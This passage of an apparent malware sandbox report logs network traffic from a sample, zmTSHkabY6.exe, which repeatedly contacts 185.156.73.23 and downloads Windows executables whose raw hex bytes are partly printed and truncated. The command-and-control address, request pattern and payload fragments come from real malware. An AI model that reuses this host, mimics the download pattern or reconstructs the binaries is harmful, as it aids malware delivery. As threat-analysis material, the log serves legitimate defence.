                                                                  Dec 20, 2024 16:23:16.702471972 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                                  Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                                  Dec 20, 2024 16:23:16.702754974 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                                                  Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                                                  Dec 20, 2024 16:23:16.702827930 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                                                  Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                                                  Dec 20, 2024 16:23:16.702841043 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                                                  Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                                                  Dec 20, 2024 16:23:16.702852964 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                                                  Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                                                  Dec 20, 2024 16:23:16.703383923 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                                                  Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                                                  Dec 20, 2024 16:23:16.711236000 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                                                  Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                                                  Dec 20, 2024 16:23:16.711606026 CET1236INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                                                  Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                                                  Dec 20, 2024 16:23:16.719445944 CET1236INData Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57
                                                                  Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
                                                                  Dec 20, 2024 16:23:17.248137951 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:17.788042068 CET203INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:17 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=97
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449762185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:19.921622992 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449779185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:26.077425003 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:27.417140007 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:27 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449791185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:31.632246971 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:33.011713982 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:32 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449801185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:35.167129040 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:36.503360033 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:36 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449808185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:38.658951998 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449818185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:41.462131977 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:42.842874050 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:42 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449825185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:45.098567963 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:46.432622910 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:46 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449836185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:48.598937988 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:49.943409920 CET204INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:49 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.449844185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:52.113068104 CET395OUTGET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.449852185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:55.508598089 CET394OUTGET /soft/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: d
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:57.004769087 CET1236INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:56 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Disposition: attachment; filename="dll";
                                                                  Content-Length: 242176
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/octet-stream
                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                                  Dec 20, 2024 16:23:57.004981041 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                                  Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                                                  Dec 20, 2024 16:23:57.004997969 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                                                  Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                                                  Dec 20, 2024 16:23:57.005295038 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                                                  Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                                                  Dec 20, 2024 16:23:57.005310059 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                                                  Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                                                  Dec 20, 2024 16:23:57.005326986 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                                                  Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                                                  Dec 20, 2024 16:23:57.005763054 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                                                  Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                                                  Dec 20, 2024 16:23:57.005779028 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                                                  Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                                                  Dec 20, 2024 16:23:57.005800962 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                                                  Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                                                  Dec 20, 2024 16:23:57.005816936 CET1236INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                                                  Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                                                  Dec 20, 2024 16:23:57.124522924 CET1236INData Raw: 0a 7d fa 01 00 04 2a 2e 73 6f 02 00 0a 80 fc 01 00 04 2a 1e 02 28 70 02 00 0a 2a 76 04 d0 65 00 00 01 28 7b 00 00 0a 28 07 01 00 0a 2c 02 17 2a 02 03 04 28 71 02 00 0a 2a 36 02 28 72 00 00 0a 02 28 8e 04 00 06 2a 32 73 8f 04 00 06 28 7a 02 00 0a
                                                                  Data Ascii: }*.so*(p*ve({(,*(q*6(r(*2s(z&*z,{5,{5o/(z*~}8s}9(5(*(}*2r p(;&*2r p(;&*J{9to*2{9o*z,{:,{:o/(T


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449858185.156.73.23802424C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 20, 2024 16:23:58.157550097 CET394OUTGET /soft/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: s
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:59.792757034 CET1236INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:59 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Disposition: attachment; filename="soft";
                                                                  Content-Length: 1502720
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/octet-stream
                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                                                  Dec 20, 2024 16:23:59.792838097 CET224INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                                                  Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r
